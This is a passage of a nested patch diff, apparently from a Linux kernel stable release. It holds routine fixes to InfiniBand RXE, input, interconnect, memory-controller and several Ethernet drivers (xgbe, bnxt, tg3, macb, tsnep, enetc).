++	struct mutex invalidate_mutex; /* covers hw removal */
+ 	unsigned long phys;
+ 	struct tid_group *grp;
+ 	u32 rcventry;
+diff --git a/drivers/infiniband/sw/rxe/rxe_param.h b/drivers/infiniband/sw/rxe/rxe_param.h
+index 86c7a8bf3cbbd..fa41009ce8a9d 100644
+--- a/drivers/infiniband/sw/rxe/rxe_param.h
++++ b/drivers/infiniband/sw/rxe/rxe_param.h
+@@ -91,11 +91,11 @@ enum rxe_device_param {
+ 	RXE_MAX_SRQ			= DEFAULT_MAX_VALUE - RXE_MIN_SRQ_INDEX,
+ 
+ 	RXE_MIN_MR_INDEX		= 0x00000001,
+-	RXE_MAX_MR_INDEX		= DEFAULT_MAX_VALUE,
+-	RXE_MAX_MR			= DEFAULT_MAX_VALUE - RXE_MIN_MR_INDEX,
+-	RXE_MIN_MW_INDEX		= 0x00010001,
+-	RXE_MAX_MW_INDEX		= 0x00020000,
+-	RXE_MAX_MW			= 0x00001000,
++	RXE_MAX_MR_INDEX		= DEFAULT_MAX_VALUE >> 1,
++	RXE_MAX_MR			= RXE_MAX_MR_INDEX - RXE_MIN_MR_INDEX,
++	RXE_MIN_MW_INDEX		= RXE_MAX_MR_INDEX + 1,
++	RXE_MAX_MW_INDEX		= DEFAULT_MAX_VALUE,
++	RXE_MAX_MW			= RXE_MAX_MW_INDEX - RXE_MIN_MW_INDEX,
+ 
+ 	RXE_MAX_PKT_PER_ACK		= 64,
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_pool.c b/drivers/infiniband/sw/rxe/rxe_pool.c
+index f50620f5a0a14..1151c0b5cceab 100644
+--- a/drivers/infiniband/sw/rxe/rxe_pool.c
++++ b/drivers/infiniband/sw/rxe/rxe_pool.c
+@@ -23,16 +23,16 @@ static const struct rxe_type_info {
+ 		.size		= sizeof(struct rxe_ucontext),
+ 		.elem_offset	= offsetof(struct rxe_ucontext, elem),
+ 		.min_index	= 1,
+-		.max_index	= UINT_MAX,
+-		.max_elem	= UINT_MAX,
++		.max_index	= RXE_MAX_UCONTEXT,
++		.max_elem	= RXE_MAX_UCONTEXT,
+ 	},
+ 	[RXE_TYPE_PD] = {
+ 		.name		= "pd",
+ 		.size		= sizeof(struct rxe_pd),
+ 		.elem_offset	= offsetof(struct rxe_pd, elem),
+ 		.min_index	= 1,
+-		.max_index	= UINT_MAX,
+-		.max_elem	= UINT_MAX,
++		.max_index	= RXE_MAX_PD,
++		.max_elem	= RXE_MAX_PD,
+ 	},
+ 	[RXE_TYPE_AH] = {
+ 		.name		= "ah",
+@@ -40,7 +40,7 @@ static const struct rxe_type_info {
+ 		.elem_offset	= offsetof(struct rxe_ah, elem),
+ 		.min_index	= RXE_MIN_AH_INDEX,
+ 		.max_index	= RXE_MAX_AH_INDEX,
+-		.max_elem	= RXE_MAX_AH_INDEX - RXE_MIN_AH_INDEX + 1,
++		.max_elem	= RXE_MAX_AH,
+ 	},
+ 	[RXE_TYPE_SRQ] = {
+ 		.name		= "srq",
+@@ -49,7 +49,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_srq_cleanup,
+ 		.min_index	= RXE_MIN_SRQ_INDEX,
+ 		.max_index	= RXE_MAX_SRQ_INDEX,
+-		.max_elem	= RXE_MAX_SRQ_INDEX - RXE_MIN_SRQ_INDEX + 1,
++		.max_elem	= RXE_MAX_SRQ,
+ 	},
+ 	[RXE_TYPE_QP] = {
+ 		.name		= "qp",
+@@ -58,7 +58,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_qp_cleanup,
+ 		.min_index	= RXE_MIN_QP_INDEX,
+ 		.max_index	= RXE_MAX_QP_INDEX,
+-		.max_elem	= RXE_MAX_QP_INDEX - RXE_MIN_QP_INDEX + 1,
++		.max_elem	= RXE_MAX_QP,
+ 	},
+ 	[RXE_TYPE_CQ] = {
+ 		.name		= "cq",
+@@ -66,8 +66,8 @@ static const struct rxe_type_info {
+ 		.elem_offset	= offsetof(struct rxe_cq, elem),
+ 		.cleanup	= rxe_cq_cleanup,
+ 		.min_index	= 1,
+-		.max_index	= UINT_MAX,
+-		.max_elem	= UINT_MAX,
++		.max_index	= RXE_MAX_CQ,
++		.max_elem	= RXE_MAX_CQ,
+ 	},
+ 	[RXE_TYPE_MR] = {
+ 		.name		= "mr",
+@@ -76,7 +76,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_mr_cleanup,
+ 		.min_index	= RXE_MIN_MR_INDEX,
+ 		.max_index	= RXE_MAX_MR_INDEX,
+-		.max_elem	= RXE_MAX_MR_INDEX - RXE_MIN_MR_INDEX + 1,
++		.max_elem	= RXE_MAX_MR,
+ 	},
+ 	[RXE_TYPE_MW] = {
+ 		.name		= "mw",
+@@ -85,7 +85,7 @@ static const struct rxe_type_info {
+ 		.cleanup	= rxe_mw_cleanup,
+ 		.min_index	= RXE_MIN_MW_INDEX,
+ 		.max_index	= RXE_MAX_MW_INDEX,
+-		.max_elem	= RXE_MAX_MW_INDEX - RXE_MIN_MW_INDEX + 1,
++		.max_elem	= RXE_MAX_MW,
+ 	},
+ };
+ 
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index b0f776448a1cd..fa021af8506e4 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -192,7 +192,6 @@ static const char * const smbus_pnp_ids[] = {
+ 	"SYN3221", /* HP 15-ay000 */
+ 	"SYN323d", /* HP Spectre X360 13-w013dx */
+ 	"SYN3257", /* HP Envy 13-ad105ng */
+-	"SYN3286", /* HP Laptop 15-da3001TU */
+ 	NULL
+ };
+ 
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index 46f8a694291ed..efc61736099b9 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -1238,6 +1238,13 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "PCX0DX"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "X170SM"),
+diff --git a/drivers/interconnect/qcom/msm8996.c b/drivers/interconnect/qcom/msm8996.c
+index c2903ae3b3bc3..25a1a32bc611f 100644
+--- a/drivers/interconnect/qcom/msm8996.c
++++ b/drivers/interconnect/qcom/msm8996.c
+@@ -33,6 +33,13 @@ static const char * const bus_a0noc_clocks[] = {
+ 	"aggre0_noc_mpu_cfg"
+ };
+ 
++static const char * const bus_a2noc_clocks[] = {
++	"bus",
++	"bus_a",
++	"aggre2_ufs_axi",
++	"ufs_axi"
++};
++
+ static const u16 mas_a0noc_common_links[] = {
+ 	MSM8996_SLAVE_A0NOC_SNOC
+ };
+@@ -1806,7 +1813,7 @@ static const struct regmap_config msm8996_a0noc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x9000,
++	.max_register	= 0x6000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1830,7 +1837,7 @@ static const struct regmap_config msm8996_a1noc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x7000,
++	.max_register	= 0x5000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1851,7 +1858,7 @@ static const struct regmap_config msm8996_a2noc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0xa000,
++	.max_register	= 0x7000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1859,6 +1866,8 @@ static const struct qcom_icc_desc msm8996_a2noc = {
+ 	.type = QCOM_ICC_NOC,
+ 	.nodes = a2noc_nodes,
+ 	.num_nodes = ARRAY_SIZE(a2noc_nodes),
++	.clocks = bus_a2noc_clocks,
++	.num_clocks = ARRAY_SIZE(bus_a2noc_clocks),
+ 	.regmap_cfg = &msm8996_a2noc_regmap_config
+ };
+ 
+@@ -1877,7 +1886,7 @@ static const struct regmap_config msm8996_bimc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x62000,
++	.max_register	= 0x5a000,
+ 	.fast_io	= true
+ };
+ 
+@@ -1988,7 +1997,7 @@ static const struct regmap_config msm8996_mnoc_regmap_config = {
+ 	.reg_bits	= 32,
+ 	.reg_stride	= 4,
+ 	.val_bits	= 32,
+-	.max_register	= 0x20000,
++	.max_register	= 0x1c000,
+ 	.fast_io	= true
+ };
+ 
+diff --git a/drivers/memory/atmel-sdramc.c b/drivers/memory/atmel-sdramc.c
+index 9c49d00c2a966..ea6e9e1eaf046 100644
+--- a/drivers/memory/atmel-sdramc.c
++++ b/drivers/memory/atmel-sdramc.c
+@@ -47,19 +47,17 @@ static int atmel_ramc_probe(struct platform_device *pdev)
+ 	caps = of_device_get_match_data(&pdev->dev);
+ 
+ 	if (caps->has_ddrck) {
+-		clk = devm_clk_get(&pdev->dev, "ddrck");
++		clk = devm_clk_get_enabled(&pdev->dev, "ddrck");
+ 		if (IS_ERR(clk))
+ 			return PTR_ERR(clk);
+-		clk_prepare_enable(clk);
+ 	}
+ 
+ 	if (caps->has_mpddr_clk) {
+-		clk = devm_clk_get(&pdev->dev, "mpddr");
++		clk = devm_clk_get_enabled(&pdev->dev, "mpddr");
+ 		if (IS_ERR(clk)) {
+ 			pr_err("AT91 RAMC: couldn't get mpddr clock\n");
+ 			return PTR_ERR(clk);
+ 		}
+-		clk_prepare_enable(clk);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/memory/mvebu-devbus.c b/drivers/memory/mvebu-devbus.c
+index 8450638e86700..efc6c08db2b70 100644
+--- a/drivers/memory/mvebu-devbus.c
++++ b/drivers/memory/mvebu-devbus.c
+@@ -280,10 +280,9 @@ static int mvebu_devbus_probe(struct platform_device *pdev)
+ 	if (IS_ERR(devbus->base))
+ 		return PTR_ERR(devbus->base);
+ 
+-	clk = devm_clk_get(&pdev->dev, NULL);
++	clk = devm_clk_get_enabled(&pdev->dev, NULL);
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+-	clk_prepare_enable(clk);
+ 
+ 	/*
+ 	 * Obtain clock period in picoseconds,
+diff --git a/drivers/memory/tegra/tegra186.c b/drivers/memory/tegra/tegra186.c
+index 62477e592bf5f..7bb73f06fad3e 100644
+--- a/drivers/memory/tegra/tegra186.c
++++ b/drivers/memory/tegra/tegra186.c
+@@ -22,32 +22,6 @@
+ #define MC_SID_STREAMID_SECURITY_WRITE_ACCESS_DISABLED BIT(16)
+ #define MC_SID_STREAMID_SECURITY_OVERRIDE BIT(8)
+ 
+-static void tegra186_mc_program_sid(struct tegra_mc *mc)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < mc->soc->num_clients; i++) {
+-		const struct tegra_mc_client *client = &mc->soc->clients[i];
+-		u32 override, security;
+-
+-		override = readl(mc->regs + client->regs.sid.override);
+-		security = readl(mc->regs + client->regs.sid.security);
+-
+-		dev_dbg(mc->dev, "client %s: override: %x security: %x\n",
+-			client->name, override, security);
+-
+-		dev_dbg(mc->dev, "setting SID %u for %s\n", client->sid,
+-			client->name);
+-		writel(client->sid, mc->regs + client->regs.sid.override);
+-
+-		override = readl(mc->regs + client->regs.sid.override);
+-		security = readl(mc->regs + client->regs.sid.security);
+-
+-		dev_dbg(mc->dev, "client %s: override: %x security: %x\n",
+-			client->name, override, security);
+-	}
+-}
+-
+ static int tegra186_mc_probe(struct tegra_mc *mc)
+ {
+ 	struct platform_device *pdev = to_platform_device(mc->dev);
+@@ -85,8 +59,6 @@ populate:
+ 	if (err < 0)
+ 		return err;
+ 
+-	tegra186_mc_program_sid(mc);
+-
+ 	return 0;
+ }
+ 
+@@ -95,13 +67,6 @@ static void tegra186_mc_remove(struct tegra_mc *mc)
+ 	of_platform_depopulate(mc->dev);
+ }
+ 
+-static int tegra186_mc_resume(struct tegra_mc *mc)
+-{
+-	tegra186_mc_program_sid(mc);
+-
+-	return 0;
+-}
+-
+ #if IS_ENABLED(CONFIG_IOMMU_API)
+ static void tegra186_mc_client_sid_override(struct tegra_mc *mc,
+ 					    const struct tegra_mc_client *client,
+@@ -173,7 +138,6 @@ static int tegra186_mc_probe_device(struct tegra_mc *mc, struct device *dev)
+ const struct tegra_mc_ops tegra186_mc_ops = {
+ 	.probe = tegra186_mc_probe,
+ 	.remove = tegra186_mc_remove,
+-	.resume = tegra186_mc_resume,
+ 	.probe_device = tegra186_mc_probe_device,
+ 	.handle_irq = tegra30_mc_handle_irq,
+ };
+diff --git a/drivers/net/dsa/microchip/ksz9477.c b/drivers/net/dsa/microchip/ksz9477.c
+index a6a0321a89310..a736971470534 100644
+--- a/drivers/net/dsa/microchip/ksz9477.c
++++ b/drivers/net/dsa/microchip/ksz9477.c
+@@ -548,10 +548,10 @@ int ksz9477_fdb_del(struct ksz_device *dev, int port,
+ 		ksz_read32(dev, REG_SW_ALU_VAL_D, &alu_table[3]);
+ 
+ 		/* clear forwarding port */
+-		alu_table[2] &= ~BIT(port);
++		alu_table[1] &= ~BIT(port);
+ 
+ 		/* if there is no port to forward, clear table */
+-		if ((alu_table[2] & ALU_V_PORT_MAP) == 0) {
++		if ((alu_table[1] & ALU_V_PORT_MAP) == 0) {
+ 			alu_table[0] = 0;
+ 			alu_table[1] = 0;
+ 			alu_table[2] = 0;
+diff --git a/drivers/net/dsa/microchip/ksz9477_i2c.c b/drivers/net/dsa/microchip/ksz9477_i2c.c
+index 3763930dc6fc4..aae1dadef882d 100644
+--- a/drivers/net/dsa/microchip/ksz9477_i2c.c
++++ b/drivers/net/dsa/microchip/ksz9477_i2c.c
+@@ -105,7 +105,7 @@ static const struct of_device_id ksz9477_dt_ids[] = {
+ 	},
+ 	{
+ 		.compatible = "microchip,ksz8563",
+-		.data = &ksz_switch_chips[KSZ9893]
++		.data = &ksz_switch_chips[KSZ8563]
+ 	},
+ 	{
+ 		.compatible = "microchip,ksz9567",
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index 9d8dfe1729948..ecce5f7a549f2 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -356,7 +356,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ 
+ 	if ((port_priv->flags & IFF_ALLMULTI && rxb->pkt_type == PACKET_MULTICAST) ||
+ 	    (port_priv->flags & IFF_BROADCAST && rxb->pkt_type == PACKET_BROADCAST))
+-		rxb->offload_fwd_mark = 1;
++		rxb->offload_fwd_mark = port_priv->priv->forwarding;
+ 
+ 	netif_rx(rxb);
+ 
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-dev.c b/drivers/net/ethernet/amd/xgbe/xgbe-dev.c
+index 3936543a74d8f..4030d619e84f5 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-dev.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-dev.c
+@@ -524,19 +524,28 @@ static void xgbe_disable_vxlan(struct xgbe_prv_data *pdata)
+ 	netif_dbg(pdata, drv, pdata->netdev, "VXLAN acceleration disabled\n");
+ }
+ 
++static unsigned int xgbe_get_fc_queue_count(struct xgbe_prv_data *pdata)
++{
++	unsigned int max_q_count = XGMAC_MAX_FLOW_CONTROL_QUEUES;
++
++	/* From MAC ver 30H the TFCR is per priority, instead of per queue */
++	if (XGMAC_GET_BITS(pdata->hw_feat.version, MAC_VR, SNPSVER) >= 0x30)
++		return max_q_count;
++	else
++		return min_t(unsigned int, pdata->tx_q_count, max_q_count);
++}
++
+ static int xgbe_disable_tx_flow_control(struct xgbe_prv_data *pdata)
+ {
+-	unsigned int max_q_count, q_count;
+ 	unsigned int reg, reg_val;
+-	unsigned int i;
++	unsigned int i, q_count;
+ 
+ 	/* Clear MTL flow control */
+ 	for (i = 0; i < pdata->rx_q_count; i++)
+ 		XGMAC_MTL_IOWRITE_BITS(pdata, i, MTL_Q_RQOMR, EHFC, 0);
+ 
+ 	/* Clear MAC flow control */
+-	max_q_count = XGMAC_MAX_FLOW_CONTROL_QUEUES;
+-	q_count = min_t(unsigned int, pdata->tx_q_count, max_q_count);
++	q_count = xgbe_get_fc_queue_count(pdata);
+ 	reg = MAC_Q0TFCR;
+ 	for (i = 0; i < q_count; i++) {
+ 		reg_val = XGMAC_IOREAD(pdata, reg);
+@@ -553,9 +562,8 @@ static int xgbe_enable_tx_flow_control(struct xgbe_prv_data *pdata)
+ {
+ 	struct ieee_pfc *pfc = pdata->pfc;
+ 	struct ieee_ets *ets = pdata->ets;
+-	unsigned int max_q_count, q_count;
+ 	unsigned int reg, reg_val;
+-	unsigned int i;
++	unsigned int i, q_count;
+ 
+ 	/* Set MTL flow control */
+ 	for (i = 0; i < pdata->rx_q_count; i++) {
+@@ -579,8 +587,7 @@ static int xgbe_enable_tx_flow_control(struct xgbe_prv_data *pdata)
+ 	}
+ 
+ 	/* Set MAC flow control */
+-	max_q_count = XGMAC_MAX_FLOW_CONTROL_QUEUES;
+-	q_count = min_t(unsigned int, pdata->tx_q_count, max_q_count);
++	q_count = xgbe_get_fc_queue_count(pdata);
+ 	reg = MAC_Q0TFCR;
+ 	for (i = 0; i < q_count; i++) {
+ 		reg_val = XGMAC_IOREAD(pdata, reg);
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index 0c5c1b1556830..43fdd111235a6 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -496,6 +496,7 @@ static enum xgbe_an xgbe_an73_tx_training(struct xgbe_prv_data *pdata,
+ 	reg |= XGBE_KR_TRAINING_ENABLE;
+ 	reg |= XGBE_KR_TRAINING_START;
+ 	XMDIO_WRITE(pdata, MDIO_MMD_PMAPMD, MDIO_PMA_10GBR_PMD_CTRL, reg);
++	pdata->kr_start_time = jiffies;
+ 
+ 	netif_dbg(pdata, link, pdata->netdev,
+ 		  "KR training initiated\n");
+@@ -632,6 +633,8 @@ static enum xgbe_an xgbe_an73_incompat_link(struct xgbe_prv_data *pdata)
+ 
+ 	xgbe_switch_mode(pdata);
+ 
++	pdata->an_result = XGBE_AN_READY;
++
+ 	xgbe_an_restart(pdata);
+ 
+ 	return XGBE_AN_INCOMPAT_LINK;
+@@ -1275,9 +1278,30 @@ static bool xgbe_phy_aneg_done(struct xgbe_prv_data *pdata)
+ static void xgbe_check_link_timeout(struct xgbe_prv_data *pdata)
+ {
+ 	unsigned long link_timeout;
++	unsigned long kr_time;
++	int wait;
+ 
+ 	link_timeout = pdata->link_check + (XGBE_LINK_TIMEOUT * HZ);
+ 	if (time_after(jiffies, link_timeout)) {
++		if ((xgbe_cur_mode(pdata) == XGBE_MODE_KR) &&
++		    pdata->phy.autoneg == AUTONEG_ENABLE) {
++			/* AN restart should not happen while KR training is in progress.
++			 * The while loop ensures no AN restart during KR training,
++			 * waits up to 500ms and AN restart is triggered only if KR
++			 * training is failed.
++			 */
++			wait = XGBE_KR_TRAINING_WAIT_ITER;
++			while (wait--) {
++				kr_time = pdata->kr_start_time +
++					  msecs_to_jiffies(XGBE_AN_MS_TIMEOUT);
++				if (time_after(jiffies, kr_time))
++					break;
++				/* AN restart is not required, if AN result is COMPLETE */
++				if (pdata->an_result == XGBE_AN_COMPLETE)
++					return;
++				usleep_range(10000, 11000);
++			}
++		}
+ 		netif_dbg(pdata, link, pdata->netdev, "AN link timeout\n");
+ 		xgbe_phy_config_aneg(pdata);
+ 	}
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe.h b/drivers/net/ethernet/amd/xgbe/xgbe.h
+index 71f24cb479355..7a41367c437dd 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe.h
++++ b/drivers/net/ethernet/amd/xgbe/xgbe.h
+@@ -290,6 +290,7 @@
+ /* Auto-negotiation */
+ #define XGBE_AN_MS_TIMEOUT		500
+ #define XGBE_LINK_TIMEOUT		5
++#define XGBE_KR_TRAINING_WAIT_ITER	50
+ 
+ #define XGBE_SGMII_AN_LINK_STATUS	BIT(1)
+ #define XGBE_SGMII_AN_LINK_SPEED	(BIT(2) | BIT(3))
+@@ -1280,6 +1281,7 @@ struct xgbe_prv_data {
+ 	unsigned int parallel_detect;
+ 	unsigned int fec_ability;
+ 	unsigned long an_start;
++	unsigned long kr_start_time;
+ 	enum xgbe_an_mode an_mode;
+ 
+ 	/* I2C support */
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 8cad15c458b39..703fc163235f9 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -3865,7 +3865,7 @@ void bnxt_ethtool_init(struct bnxt *bp)
+ 		test_info->timeout = HWRM_CMD_TIMEOUT;
+ 	for (i = 0; i < bp->num_tests; i++) {
+ 		char *str = test_info->string[i];
+-		char *fw_str = resp->test0_name + i * 32;
++		char *fw_str = resp->test_name[i];
+ 
+ 		if (i == BNXT_MACLPBK_TEST_IDX) {
+ 			strcpy(str, "Mac loopback test (offline)");
+@@ -3876,14 +3876,9 @@ void bnxt_ethtool_init(struct bnxt *bp)
+ 		} else if (i == BNXT_IRQ_TEST_IDX) {
+ 			strcpy(str, "Interrupt_test (offline)");
+ 		} else {
+-			strscpy(str, fw_str, ETH_GSTRING_LEN);
+-			strncat(str, " test", ETH_GSTRING_LEN - strlen(str));
+-			if (test_info->offline_mask & (1 << i))
+-				strncat(str, " (offline)",
+-					ETH_GSTRING_LEN - strlen(str));
+-			else
+-				strncat(str, " (online)",
+-					ETH_GSTRING_LEN - strlen(str));
++			snprintf(str, ETH_GSTRING_LEN, "%s test (%s)",
++				 fw_str, test_info->offline_mask & (1 << i) ?
++					"offline" : "online");
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h b/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h
+index b753032a10474..fb78fc38530da 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_hsi.h
+@@ -10099,14 +10099,7 @@ struct hwrm_selftest_qlist_output {
+ 	u8	unused_0;
+ 	__le16	test_timeout;
+ 	u8	unused_1[2];
+-	char	test0_name[32];
+-	char	test1_name[32];
+-	char	test2_name[32];
+-	char	test3_name[32];
+-	char	test4_name[32];
+-	char	test5_name[32];
+-	char	test6_name[32];
+-	char	test7_name[32];
++	char	test_name[8][32];
+ 	u8	eyescope_target_BER_support;
+ 	#define SELFTEST_QLIST_RESP_EYESCOPE_TARGET_BER_SUPPORT_BER_1E8_SUPPORTED  0x0UL
+ 	#define SELFTEST_QLIST_RESP_EYESCOPE_TARGET_BER_SUPPORT_BER_1E9_SUPPORTED  0x1UL
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index 4179a12fc8819..af9ea5e4371b3 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -11174,7 +11174,7 @@ static void tg3_reset_task(struct work_struct *work)
+ 	rtnl_lock();
+ 	tg3_full_lock(tp, 0);
+ 
+-	if (!netif_running(tp->dev)) {
++	if (tp->pcierr_recovery || !netif_running(tp->dev)) {
+ 		tg3_flag_clear(tp, RESET_TASK_PENDING);
+ 		tg3_full_unlock(tp);
+ 		rtnl_unlock();
+@@ -18109,6 +18109,9 @@ static pci_ers_result_t tg3_io_error_detected(struct pci_dev *pdev,
+ 
+ 	netdev_info(netdev, "PCI I/O error detected\n");
+ 
++	/* Want to make sure that the reset task doesn't run */
++	tg3_reset_task_cancel(tp);
++
+ 	rtnl_lock();
+ 
+ 	/* Could be second call or maybe we don't have netdev yet */
+@@ -18125,9 +18128,6 @@ static pci_ers_result_t tg3_io_error_detected(struct pci_dev *pdev,
+ 
+ 	tg3_timer_stop(tp);
+ 
+-	/* Want to make sure that the reset task doesn't run */
+-	tg3_reset_task_cancel(tp);
+-
+ 	netif_device_detach(netdev);
+ 
+ 	/* Clean up software state, even if MMIO is blocked */
+diff --git a/drivers/net/ethernet/cadence/macb_main.c b/drivers/net/ethernet/cadence/macb_main.c
+index 4f63f1ba3161c..300f47ca42e3e 100644
+--- a/drivers/net/ethernet/cadence/macb_main.c
++++ b/drivers/net/ethernet/cadence/macb_main.c
+@@ -2188,7 +2188,6 @@ static int macb_pad_and_fcs(struct sk_buff **skb, struct net_device *ndev)
+ 	bool cloned = skb_cloned(*skb) || skb_header_cloned(*skb) ||
+ 		      skb_is_nonlinear(*skb);
+ 	int padlen = ETH_ZLEN - (*skb)->len;
+-	int headroom = skb_headroom(*skb);
+ 	int tailroom = skb_tailroom(*skb);
+ 	struct sk_buff *nskb;
+ 	u32 fcs;
+@@ -2202,9 +2201,6 @@ static int macb_pad_and_fcs(struct sk_buff **skb, struct net_device *ndev)
+ 		/* FCS could be appeded to tailroom. */
+ 		if (tailroom >= ETH_FCS_LEN)
+ 			goto add_fcs;
+-		/* FCS could be appeded by moving data to headroom. */
+-		else if (!cloned && headroom + tailroom >= ETH_FCS_LEN)
+-			padlen = 0;
+ 		/* No room for FCS, need to reallocate skb. */
+ 		else
+ 			padlen = ETH_FCS_LEN;
+@@ -2213,10 +2209,7 @@ static int macb_pad_and_fcs(struct sk_buff **skb, struct net_device *ndev)
+ 		padlen += ETH_FCS_LEN;
+ 	}
+ 
+-	if (!cloned && headroom + tailroom >= padlen) {
+-		(*skb)->data = memmove((*skb)->head, (*skb)->data, (*skb)->len);
+-		skb_set_tail_pointer(*skb, (*skb)->len);
+-	} else {
++	if (cloned || tailroom < padlen) {
+ 		nskb = skb_copy_expand(*skb, 0, padlen, GFP_ATOMIC);
+ 		if (!nskb)
+ 			return -ENOMEM;
+diff --git a/drivers/net/ethernet/engleder/tsnep_main.c b/drivers/net/ethernet/engleder/tsnep_main.c
+index 13d5ff4e0e020..6bf3cc11d2121 100644
+--- a/drivers/net/ethernet/engleder/tsnep_main.c
++++ b/drivers/net/ethernet/engleder/tsnep_main.c
+@@ -419,7 +419,7 @@ static netdev_tx_t tsnep_xmit_frame_ring(struct sk_buff *skb,
+ 		/* ring full, shall not happen because queue is stopped if full
+ 		 * below
+ 		 */
+-		netif_stop_queue(tx->adapter->netdev);
++		netif_stop_subqueue(tx->adapter->netdev, tx->queue_index);
+ 
+ 		spin_unlock_irqrestore(&tx->lock, flags);
+ 
+@@ -462,7 +462,7 @@ static netdev_tx_t tsnep_xmit_frame_ring(struct sk_buff *skb,
+ 
+ 	if (tsnep_tx_desc_available(tx) < (MAX_SKB_FRAGS + 1)) {
+ 		/* ring can get full with next frame */
+-		netif_stop_queue(tx->adapter->netdev);
++		netif_stop_subqueue(tx->adapter->netdev, tx->queue_index);
+ 	}
+ 
+ 	spin_unlock_irqrestore(&tx->lock, flags);
+@@ -472,11 +472,14 @@ static netdev_tx_t tsnep_xmit_frame_ring(struct sk_buff *skb,
+ 
+ static bool tsnep_tx_poll(struct tsnep_tx *tx, int napi_budget)
+ {
++	struct tsnep_tx_entry *entry;
++	struct netdev_queue *nq;
+ 	unsigned long flags;
+ 	int budget = 128;
+-	struct tsnep_tx_entry *entry;
+-	int count;
+ 	int length;
++	int count;
++
++	nq = netdev_get_tx_queue(tx->adapter->netdev, tx->queue_index);
+ 
+ 	spin_lock_irqsave(&tx->lock, flags);
+ 
+@@ -533,8 +536,8 @@ static bool tsnep_tx_poll(struct tsnep_tx *tx, int napi_budget)
+ 	} while (likely(budget));
+ 
+ 	if ((tsnep_tx_desc_available(tx) >= ((MAX_SKB_FRAGS + 1) * 2)) &&
+-	    netif_queue_stopped(tx->adapter->netdev)) {
+-		netif_wake_queue(tx->adapter->netdev);
++	    netif_tx_queue_stopped(nq)) {
++		netif_tx_wake_queue(nq);
+ 	}
+ 
+ 	spin_unlock_irqrestore(&tx->lock, flags);
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc.c b/drivers/net/ethernet/freescale/enetc/enetc.c
+index 3a79ead5219ae..e96449eedfb54 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc.c
+@@ -2290,14 +2290,14 @@ static void enetc_tx_onestep_tstamp(struct work_struct *work)
+ 
+ 	priv = container_of(work, struct enetc_ndev_priv, tx_onestep_tstamp);
+ 
+-	netif_tx_lock(priv->ndev);
++	netif_tx_lock_bh(priv->ndev);
+ 
+ 	clear_bit_unlock(ENETC_TX_ONESTEP_TSTAMP_IN_PROGRESS, &priv->flags);
+ 	skb = skb_dequeue(&priv->tx_skbs);
+ 	if (skb)
+ 		enetc_start_xmit(skb, priv->ndev);
+ 
+-	netif_tx_unlock(priv->ndev);
++	netif_tx_unlock_bh(priv->ndev);
+ }
+ 
+ static void enetc_tx_onestep_tstamp_init(struct enetc_ndev_priv *priv)
